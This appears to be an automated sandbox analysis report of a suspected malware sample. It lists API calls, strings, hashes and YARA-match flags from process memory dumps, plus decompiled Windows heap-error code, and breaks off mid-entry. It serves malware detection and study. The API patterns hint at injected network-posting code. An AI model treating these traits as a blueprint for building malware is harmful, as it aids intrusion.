LdrInitializeThunk.NTDLL ref: 034695DA

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e14536db0a048d019b1c9dc0630e991a365a469e612ed9124fa767fa4ec3f196
Instruction ID: 5df116ea07b011e3a5d2285cb9e8974d0b5c85eff49e3716b1ca15a1878ac7e5
Opcode Fuzzy Hash: e14536db0a048d019b1c9dc0630e991a365a469e612ed9124fa767fa4ec3f196
Instruction Fuzzy Hash: D09002A1612044075105B1694414656400A9BE1241B51C022E1005990DC76588917169

Uniqueness

Uniqueness Score: -1.00%

Function 034699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 034699AA

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 943705b4e9d39ff60332ceb201590fedcd745ec0c15c26c072ffb26c607747f7
Instruction ID: bea58112dade2d44eb84ec18d6bf339eaadd1158e0629dd9c58b24ee51a1f1ca
Opcode Fuzzy Hash: 943705b4e9d39ff60332ceb201590fedcd745ec0c15c26c072ffb26c607747f7
Instruction Fuzzy Hash: C99002A175104846E100A1694414B460005DBE2341F51C016E1055954D8759CC52716A

Uniqueness

Uniqueness Score: -1.00%

Function 03469840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0346984A

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 32815766699fc65d16551099cf8225c37082582fe1b9401d0c77260a7443dc66
Instruction ID: 481231ef97b8bd6862f4f3bde2105b7cd1da3164f70d9fc1b01fb06b7535c782
Opcode Fuzzy Hash: 32815766699fc65d16551099cf8225c37082582fe1b9401d0c77260a7443dc66
Instruction Fuzzy Hash: 96900261652085566545F16944045474006ABE1281791C013A1405D50C87669856E665

Uniqueness

Uniqueness Score: -1.00%

Function 03469860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0346986A

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eee66bf98d5e7f346a28c14f97dabf5d1f555fa493f51bfc3e9bf70bc80b8fdb
Instruction ID: 721692241b1575d16b876efe69372349f47c98cba18c4ad950efe9127ba264bc
Opcode Fuzzy Hash: eee66bf98d5e7f346a28c14f97dabf5d1f555fa493f51bfc3e9bf70bc80b8fdb
Instruction Fuzzy Hash: C090027161104817E111A169450474700099BD1281F91C413A0415958D97968952B165

Uniqueness

Uniqueness Score: -1.00%

Function 005A72E6, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 005A7398

Strings

net.dll, xrefs: 005A7361, 005A73BF, 005A73CB
POST, xrefs: 005A72CB, 005A72CE, 005A72CF, 005A72D6
wininet.dll, xrefs: 005A734E, 005A7357

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: POST$net.dll$wininet.dll
API String ID: 3472027048-3140911592
Opcode ID: 6ad89d8f0a588f193afa66d881dcef4185fbcf7fc165c8145942b0375b976146
Instruction ID: 2ec1c2de29d69b6555fc9280f59d2d13e1448d66009d67280d8a5ec880885753
Opcode Fuzzy Hash: 6ad89d8f0a588f193afa66d881dcef4185fbcf7fc165c8145942b0375b976146
Instruction Fuzzy Hash: 44311271605209ABDB11DF68CC95BAFBFA8FF89300F00812DF9199B242D775A915CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 005A72F0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 005A7398

Strings

net.dll, xrefs: 005A7361, 005A73E7, 005A73BF, 005A73CB, 005A73F3
wininet.dll, xrefs: 005A734E, 005A7357

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 868f02565f377e5243d55d982e195c04ddcb0a14e723eadc4c97a2f41f87c23c
Instruction ID: 1c619f8dbb4e0c46a91ebee6ae52443d90c6b6a98e5db8aaf2571c9fcafbc143
Opcode Fuzzy Hash: 868f02565f377e5243d55d982e195c04ddcb0a14e723eadc4c97a2f41f87c23c
Instruction Fuzzy Hash: BA31A1B6605705ABCB11DF64CCA5F9BBBB8BB89700F00851DF61A9B241D734B546CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 005A88D2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00593B93), ref: 005A890D

Strings

.z`, xrefs: 005A88FC, 005A8908

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 746555e4b215e68f6e48511bb99a48f351f475705b2496969b2b2755e672d878
Instruction ID: c5553700b01e73706615673902c477f4b2c89fbebc29da9d58867b4174192dd1
Opcode Fuzzy Hash: 746555e4b215e68f6e48511bb99a48f351f475705b2496969b2b2755e672d878
Instruction Fuzzy Hash: 3EF0A0B12406146FCB04CF28CC44EE737ADEF85320F144215B91DCB282C230D901CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 005A88E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00593B93), ref: 005A890D

Strings

.z`, xrefs: 005A88FC, 005A8908

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 797b5cad665fc6a0d6f4320ab98f6901081e2c6bd3a15d9da252481d7f1e279d
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: C8E046B1200219ABDB18EF99CC49EAB77ACEF88750F018558FE085B242C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 005A88A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(&5Z,?,005A3C9F,005A3C9F,?,005A3526,?,?,?,?,?,00000000,00000000,?), ref: 005A88CD

Strings

&5Z, xrefs: 005A88C2, 005A88CC

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5Z
API String ID: 1279760036-3926825244
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: e96760c46326019de137b8eff9679c95ad8b0d5b71945910ebb122da1c3d4b9e
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: EFE012B1200218ABDB18EF99CC45EAB77ACAF88650F118558BE085B242C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00597270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 005972CA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 005972EB

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 17bf1a12fb81164548b30c1481225c3706791b62dfa32afc893a89784d206fbb
Instruction ID: 2be8d11f84d7a3db61082a1da65ad4dad9e4f4c6d348be0929879b4c8a733353
Opcode Fuzzy Hash: 17bf1a12fb81164548b30c1481225c3706791b62dfa32afc893a89784d206fbb
Instruction Fuzzy Hash: 7E01A731A9022977EB20A6949C07FBE7B6C6F45F51F140119FF04BA1C1E794690586F6

Uniqueness

Uniqueness Score: -1.00%

Function 005A8912, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 005A89A4

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 17e6059b1bb115b20227641a58b52744b4dc87b382939dd152d598584b84c9cf
Instruction ID: d8c7d3d245246650dca9c73b72d9d8d00a58d723169fff2f5f08937de44cb10b
Opcode Fuzzy Hash: 17e6059b1bb115b20227641a58b52744b4dc87b382939dd152d598584b84c9cf
Instruction Fuzzy Hash: 9D1116B2210108BBDB18DF98CC85EEB77A9AF8C754F158258FA0D97241C630E900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00599B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00599BA2

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: e610f1ac2af06ef9b44cc6a6e4005ccfd4be74bbfad134fcbf865e11f5886ab4
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: E90171B5D0020EABDF10DBE4EC46FDDBBB9AB94308F008195E90997241F631EB04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 005A894D, Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 005A89A4

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: b370df5b9b43cc87e9264c2d2f611a5f2d360df635bfa14d54eb43822063157b
Instruction ID: b6260f96325f8097fa8a35ce29aee0862a6ae754f16e5a448b9b32b6d22db4bb
Opcode Fuzzy Hash: b370df5b9b43cc87e9264c2d2f611a5f2d360df635bfa14d54eb43822063157b
Instruction Fuzzy Hash: 460100B2204608AFCB04CF88DC80EEB3BADAF8D310F158258FA4997241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005A8950, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 005A89A4

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: eef90c39e121772d92f18e8edf35d6cbc91211649b93f07533b6431449967a79
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: C901B2B2210108BFCB58DF89DC84EEB77ADAF8C754F158258FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 005A7420, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0059CCE0,?,?), ref: 005A745C

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c715afaf5ee72f4797a90bb05736108bd71666473cbd07088045a551ffb1ab32
Instruction ID: b680b55f190eb29272af851eb02e57b2c5e0669e858a9444f440bceed35810e3
Opcode Fuzzy Hash: c715afaf5ee72f4797a90bb05736108bd71666473cbd07088045a551ffb1ab32
Instruction Fuzzy Hash: C0E06D333802143AE7206599AC03FABB79CAB8AB24F140026FB0DEA2C1D595F80142A8

Uniqueness

Uniqueness Score: -1.00%

Function 005A8A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0059CFB2,0059CFB2,?,00000000,?,?), ref: 005A8A70

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: c870ca813420f166b69c11ff1f18aca26394deacba8919ca1e904f06c8cf9454
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 33E01AB12002186BDB14DF49CC85EEB37ADAF89650F018154BE0857241C930E810CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 0059D41A, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00597C73,?), ref: 0059D44B

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 0e2ba4215ddb86c5a0ea6d1cb6d10244a72310a48c1600dd42d99eda72bb6955
Instruction ID: 8a398ea2203dd13c4a1dc5f51eb264230fae3ba2fcba77b30afdad016152465a
Opcode Fuzzy Hash: 0e2ba4215ddb86c5a0ea6d1cb6d10244a72310a48c1600dd42d99eda72bb6955
Instruction Fuzzy Hash: 8DD02B357402003AEB00EF608C06F767B847F95704F490078F50CD73C3DA31D2014121

Uniqueness

Uniqueness Score: -1.00%

Function 0059D417, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00597C73,?), ref: 0059D44B

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1a95b08ccd8315acf8369c4f34c3a1c299924e38e560ba749ac97031beb77c2a
Instruction ID: 76f551d78080e0b4edbb96bec5c65595ae396ac3d727b54ab35383567b01a73c
Opcode Fuzzy Hash: 1a95b08ccd8315acf8369c4f34c3a1c299924e38e560ba749ac97031beb77c2a
Instruction Fuzzy Hash: A2D0A9A1AA83042AEE20EBB05C02F2A6B982B41B04F064994F24CEB0C3E9A4E0205035

Uniqueness

Uniqueness Score: -1.00%

Function 0059D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00597C73,?), ref: 0059D44B

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: 226eb1d88d758d85465a9a918bf371bda1cd12f25b83258f5311ca4a1f13fc96
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: 68D05E617503042AEA10BAA49C07F2676CC6B85B04F494064FA48962C3E964E5004161

Uniqueness

Uniqueness Score: -1.00%

Function 0346967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03469694

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 408f98bb28fad13db04a7addddd82894b10a77085ba04b0c71b23c49688623a5
Instruction ID: 0e64d032b35b3d998cbe89a51822748acb3deb99f77375d407e35f5d770b0972
Opcode Fuzzy Hash: 408f98bb28fad13db04a7addddd82894b10a77085ba04b0c71b23c49688623a5
Instruction Fuzzy Hash: 80B09B71D015C5C9E711D770470871779047BD1741F16C053D1020A51A4778C091F5BA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 034DB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** An Access Violation occurred in %ws:%s, xrefs: 034DB48F
<unknown>, xrefs: 034DB27E, 034DB2D1, 034DB350, 034DB399, 034DB417, 034DB48E
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 034DB484
*** A stack buffer overrun occurred in %ws:%s, xrefs: 034DB2F3
*** enter .exr %p for the exception record, xrefs: 034DB4F1
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 034DB323
The instruction at %p referenced memory at %p., xrefs: 034DB432
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 034DB2DC
The critical section is owned by thread %p., xrefs: 034DB3B9
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 034DB53F
This failed because of error %Ix., xrefs: 034DB446
The instruction at %p tried to %s , xrefs: 034DB4B6
a NULL pointer, xrefs: 034DB4E0
*** Resource timeout (%p) in %ws:%s, xrefs: 034DB352
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 034DB305
read from, xrefs: 034DB4AD, 034DB4B2
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 034DB38F
*** enter .cxr %p for the context, xrefs: 034DB50D
Go determine why that thread has not released the critical section., xrefs: 034DB3C5
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 034DB39B
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 034DB3D6
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 034DB476
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 034DB314
write to, xrefs: 034DB4A6
The resource is owned shared by %d threads, xrefs: 034DB37E
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 034DB47D
*** then kb to get the faulting stack, xrefs: 034DB51C
an invalid address, %p, xrefs: 034DB4CF
The resource is owned exclusively by thread %p, xrefs: 034DB374
*** Inpage error in %ws:%s, xrefs: 034DB418

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: d951babca107d8c1cfc129900f02c9c4cc5113d02a8e09ee26701e8d4aff9fcd
Instruction ID: 2d72998f77abf5084c67891a9e699b084cb8b9e68311e4d42257e9c43a83d7fd
Opcode Fuzzy Hash: d951babca107d8c1cfc129900f02c9c4cc5113d02a8e09ee26701e8d4aff9fcd
Instruction Fuzzy Hash: 4781E179A00610FFCB22DE069C69DBF7B35EF47A51F06408BF4141F212D2668562D6BE

Uniqueness

Uniqueness Score: -1.00%

Function 034E1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E034E1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x34048a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0342B150();
				} else {
					E0342B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x351589c);
				E0342B150("Heap error detected at %p (heap handle %p)\n",  *0x35158a0);
				_t27 =  *0x3515898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M034E1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0342B150();
				} else {
					E0342B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0342B150("Error code: %d - %s\n",  *0x3515898);
				_t113 =  *0x35158a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0342B150();
					} else {
						E0342B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0342B150("Parameter1: %p\n",  *0x35158a4);
				}
				_t115 =  *0x35158a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0342B150();
					} else {
						E0342B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0342B150("Parameter2: %p\n",  *0x35158a8);
				}
				_t117 =  *0x35158ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0342B150();
					} else {
						E0342B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0342B150("Parameter3: %p\n",  *0x35158ac);
				}
				_t119 =  *0x35158b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0342B150();
					} else {
						E0342B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x35158b4);
					E0342B150("Last known valid blocks: before - %p, after - %p\n",  *0x35158b0);
				} else {
					_t120 =  *0x35158b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0342B150();
				} else {
					E0342B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0342B150("Stack trace available at %p\n", 0x35158c0);
			}

0x034e1c10
0x034e1c16
0x034e1c1e
0x034e1c3d
0x034e1c3e
0x034e1c20
0x034e1c35
0x034e1c3a
0x034e1c44
0x034e1c55
0x034e1c5a
0x034e1c65
0x034e1c67
0x00000000
0x034e1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x034e1c67
0x034e1cdc
0x034e1ce5
0x034e1d04
0x034e1d05
0x034e1ce7
0x034e1cfc
0x034e1d01
0x034e1d0b
0x034e1d17
0x034e1d1f
0x034e1d25
0x034e1d30
0x034e1d4f
0x034e1d50
0x034e1d32
0x034e1d47
0x034e1d4c
0x034e1d61
0x034e1d67
0x034e1d68
0x034e1d6e
0x034e1d79
0x034e1d98
0x034e1d99
0x034e1d7b
0x034e1d90
0x034e1d95
0x034e1daa
0x034e1db0
0x034e1db1
0x034e1db7
0x034e1dc2
0x034e1de1
0x034e1de2
0x034e1dc4
0x034e1dd9
0x034e1dde
0x034e1df3
0x034e1df9
0x034e1dfa
0x034e1e00
0x034e1e0a
0x034e1e13
0x034e1e32
0x034e1e33
0x034e1e15
0x034e1e2a
0x034e1e2f
0x034e1e39
0x034e1e4a
0x034e1e02
0x034e1e02
0x034e1e08
0x00000000
0x00000000
0x034e1e08
0x034e1e5b
0x034e1e7a
0x034e1e7b
0x034e1e5d
0x034e1e72
0x034e1e77
0x034e1e95

Strings

heap_failure_listentry_corruption, xrefs: 034E1CD0
heap_failure_block_not_busy, xrefs: 034E1CA6
Heap error detected at %p (heap handle %p), xrefs: 034E1C50
heap_failure_invalid_allocation_type, xrefs: 034E1CB4
heap_failure_entry_corruption, xrefs: 034E1C83
Stack trace available at %p, xrefs: 034E1E86
heap_failure_invalid_argument, xrefs: 034E1CAD
HEAP: , xrefs: 034E1C16, 034E1C3D, 034E1D04, 034E1D4F, 034E1D98, 034E1DE1, 034E1E32, 034E1E7A
heap_failure_generic, xrefs: 034E1C7C
heap_failure_unknown, xrefs: 034E1C75
heap_failure_virtual_block_corruption, xrefs: 034E1C91
heap_failure_internal, xrefs: 034E1C6E
heap_failure_buffer_underrun, xrefs: 034E1C9F
Error code: %d - %s, xrefs: 034E1D12
HEAP[%wZ]: , xrefs: 034E1C30, 034E1CF7, 034E1D42, 034E1D8B, 034E1DD4, 034E1E25, 034E1E6D
Parameter2: %p, xrefs: 034E1DA5
Parameter3: %p, xrefs: 034E1DEE
heap_failure_usage_after_free, xrefs: 034E1CBB
Last known valid blocks: before - %p, after - %p, xrefs: 034E1E45
heap_failure_buffer_overrun, xrefs: 034E1C98
heap_failure_cross_heap_operation, xrefs: 034E1CC2
heap_failure_multiple_entries_corruption, xrefs: 034E1C8A
Parameter1: %p, xrefs: 034E1D5C
heap_failure_freelists_corruption, xrefs: 034E1CC9
heap_failure_lfh_bitmap_mismatch, xrefs: 034E1CD7

Memory Dump Source

